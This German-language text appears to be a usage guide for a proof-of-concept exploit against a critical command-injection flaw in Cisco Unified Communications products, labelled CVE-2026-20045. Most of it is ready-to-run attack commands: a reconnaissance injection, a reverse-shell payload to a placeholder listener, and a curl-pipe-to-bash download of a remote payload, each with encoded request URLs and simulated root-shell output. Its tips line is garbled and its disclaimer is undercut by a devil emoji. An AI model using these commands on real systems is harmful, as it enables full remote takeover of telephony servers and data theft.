
Proof-of-Concept-Exploit für CVE-2026-20045, eine kritische, nicht authentifizierte RCE in Cisco Unified Communications-Produkten, die Befehlsinjektion und eine Reverse Shell mit Root-Eskalation ermöglicht.

Eine kritische Remote-Code-Ausführungs-Schwachstelle (RCE), die mehrere Cisco Unified Communications-Produkte betrifft. Sie wurde aktiv in freier Wildbahn ausgenutzt, bevor Patches veröffentlicht wurden.
Das bedeutet, dass ein Angreifer betroffene Systeme vollständig remote übernehmen könnte.
Hier ist eine übersichtliche Anleitung mit Verwendungsbeispielen zum Ausführen des PoC-Skripts, einschließlich genau dem, was Sie sehen würden, wenn der Exploit auf einem verwundbaren Cisco-Unified-Communications-Ziel erfolgreich ist (ungepatchte Weboberfläche exponiert). Ich habe etwas Ästhetik mit Emojis, farbigen Codeblöcken (via Markdown) und strukturierten Abschnitten für bessere Lesbarkeit hinzugefügt. 😎
Dies führt einfache Befehle aus, um Benutzer-ID, Benutzername und Systemdetails abzurufen.
Befehl:
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"
Was Sie sehen würden, wenn es funktioniert (Erfolgreiche Ausgabe):
[*] Sende Stage-1-Injektion an: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj
[*] Anfangsbefehl: id && whoami && uname -a
[+] Stage 1 wahrscheinlich erfolgreich! Status: 200
[*] Sende Stage-2-Eskalation an: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h
[+] Stage 2 (Root-Eskalation) wahrscheinlich erfolgreich! Status: 200
[+] Mögliche Befehlsausgabe:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
root
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
------------------------------------------------------------
🔑 Wichtige Anzeichen: Grüne [+]-Indikatoren, HTTP-200-Status und Befehlsergebnisse im Ausgabeblock. Wenn keine Ausgabe angezeigt wird, aber der Status 200 ist, hat es trotzdem still funktioniert!
Dies erzeugt eine interaktive Shell zurück zu Ihrem Rechner. Starten Sie zuerst einen Listener: nc -lvnp 4444.
Befehl:
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Was Sie sehen würden, wenn es funktioniert (Im Skript-Terminal):
[*] Sende Stage-1-Injektion an: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==
[*] Anfangsbefehl: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
[+] Stage 1 wahrscheinlich erfolgreich! Status: 200
[*] Sende Stage-2-Eskalation an: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==
[+] Stage 2 (Root-Eskalation) wahrscheinlich erfolgreich! Status: 200
[+] Befehl still ausgeführt (Ziel auf Auswirkungen prüfen)
Was Sie im Listener-Terminal (nc) sehen würden:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
root@ucm-server:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ucm-server:~#
🚀 Wichtige Anzeichen: Skript zeigt Erfolgsmeldungen; Listener erhält sofort eine Root-Shell-Eingabeaufforderung. Geben Sie dort Befehle ein, um zu interagieren!
Dies lädt ein Skript von Ihrem Server herunter und führt es aus.
Befehl:
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"
Was Sie sehen würden, wenn es funktioniert (Erfolgreiche Ausgabe):
[*] Sende Stage-1-Injektion an: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=
[*] Anfangsbefehl: curl -s http://YOUR_SERVER/payload.sh | bash
[+] Stage 1 wahrscheinlich erfolgreich! Status: 200
[*] Sende Stage-2-Eskalation an: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=
[+] Stage 2 (Root-Eskalation) wahrscheinlich erfolgreich! Status: 200
[+] Befehl still ausgeführt (Ziel auf Auswirkungen prüfen)
📥 Wichtige Anzeichen: 200-Statuscodes; auf dem Ziel verifizieren (z. B. Protokolle/Dateien prüfen) oder auf Ihrem Server (Download-Protokolle). Keine direkte Ausgabe, wenn das Payload still ist.
💡 Profi-Tipps:
sudo aus, um Netzwerkprivilegien zu erhalten.Unzureichende Validierung von benutzereingegebenen Daten in HTTP-Verwaltungsschnittstellen, was Befehlsinjektion ermöglicht, die zu Remote-Code-Ausführung führt.
Der gesamte PoC-Code dient nur ethischen, pädagogischen Zwecken auf autorisierten Systemen. Unautorisierte Ausnutzung ist illegal; es wird keine Haftung für Missbrauch übernommen. 😈